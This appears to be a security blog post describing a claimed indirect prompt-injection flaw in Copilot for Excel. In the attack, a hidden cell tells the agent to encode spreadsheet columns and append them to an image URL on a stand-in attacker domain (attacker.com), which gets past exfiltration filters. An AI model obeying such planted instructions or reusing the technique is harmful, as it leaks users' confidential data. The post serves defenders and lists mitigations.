CVE-2026-26144: Inside the "Ghost Ledger" Copilot Excel Data Leak

Security Warning: AI agents often have broad access to your documents. To prevent sensitive PII from leaking during AI analysis, use our Developer Data Masking Tool to scrub local data before it touches any cloud-based LLM or agentic RAG pipeline.

A critical information disclosure vulnerability, designated as CVE-2026-26144, has been identified in Microsoft's Copilot integration within Excel. This flaw, dubbed "Ghost Ledger" by researchers, allows an attacker to exfiltrate sensitive enterprise spreadsheet data without any explicit user action beyond opening a document. The vulnerability highlights a fundamental weakness in current Agentic RAG (Retrieval-Augmented Generation) architectures: the lack of strict output validation for autonomous agents.

The Anatomy of the Exploit

The exploit leverages a technique known as "Indirect Prompt Injection." An attacker embeds a hidden instruction within a seemingly innocent Excel cell. When a user opens the file and Copilot performs its initial "Suggested Analysis" or "Workbook Summary," the agent reads the hidden cell. The instruction directs the agent to encode the contents of specific columns (e.g., "Salary" or "Customer Email") and append them to an image request or a markdown link to an attacker-controlled domain.

The Role of Automated Previews

What makes CVE-2026-26144 particularly dangerous is that it can trigger during the automated preview phase. Many enterprise document management systems automatically invoke AI summarizers to provide snippets for search results or file previews. In these headless environments, the agent executes the malicious instruction and sends the data back to the attacker's server, all before the user has even clicked on the file.

Technical Breakdown: Bypassing Guardrails

Microsoft's standard safety guardrails are designed to catch explicit requests for data exfiltration, such as "Send this email to x@attacker.com." However, CVE-2026-26144 bypasses these by using stenographic rendering. The agent is instructed to "summarize" the data into a high-entropy string and then "display a relevant icon from this URL: https://attacker.com/icon.png?data=[ENCODED_STRING]." Because the agent perceives this as a UI-related task (fetching an icon), it doesn't trigger the exfiltration filters.

Impact on Enterprise RAG Pipelines

This vulnerability isn't limited to the Excel desktop app. Any enterprise RAG pipeline that uses Copilot or similar agents to index and search internal spreadsheets is vulnerable. If an attacker can get a malicious file into the corporate SharePoint or OneDrive, the indexing agent will effectively act as a "data mule," carrying secrets out of the secure perimeter and into the attacker's hands.

Mitigation and Recovery

Microsoft has released a server-side patch that attempts to sanitize URLs generated by Copilot agents, but security researchers warn that polymorphic variations of the injection can still bypass these checks. For enterprises, the recommended immediate actions are:

• Disable "Auto-Analysis" for external or untrusted documents in M365 settings.
• Implement Egress Filtering: Block outbound requests to non-whitelisted domains from the application processes that host AI agents.
• Data Masking: Use local tools to mask PII in spreadsheets before they are uploaded to AI-enabled cloud storage.

The "Trust Gap" in Agentic AI

CVE-2026-26144 is a wake-up call for the AI industry. As we move from "Chatbots" to "Agents" that have the power to browse, read, and write on our behalf, the attack surface expands exponentially. We are essentially giving the AI "eyes" to see our secrets and "hands" to move them. Without a robust Zero Trust architecture for AI, where every agent action is verified and every output is scrubbed, these types of leaks will become a recurring nightmare for CSOs.

Conclusion: Securing the Future of Work

As we embrace the productivity gains of Microsoft Copilot, we must also acknowledge the inherent risks of letting an LLM "think" about our most sensitive data. CVE-2026-26144 is not just a bug; it is a symptom of a design philosophy that prioritizes capability over containment. Moving forward, the only way to safely deploy agentic AI is to treat it as an untrusted user within our networks—subject to the same, if not stricter, oversight as any human employee.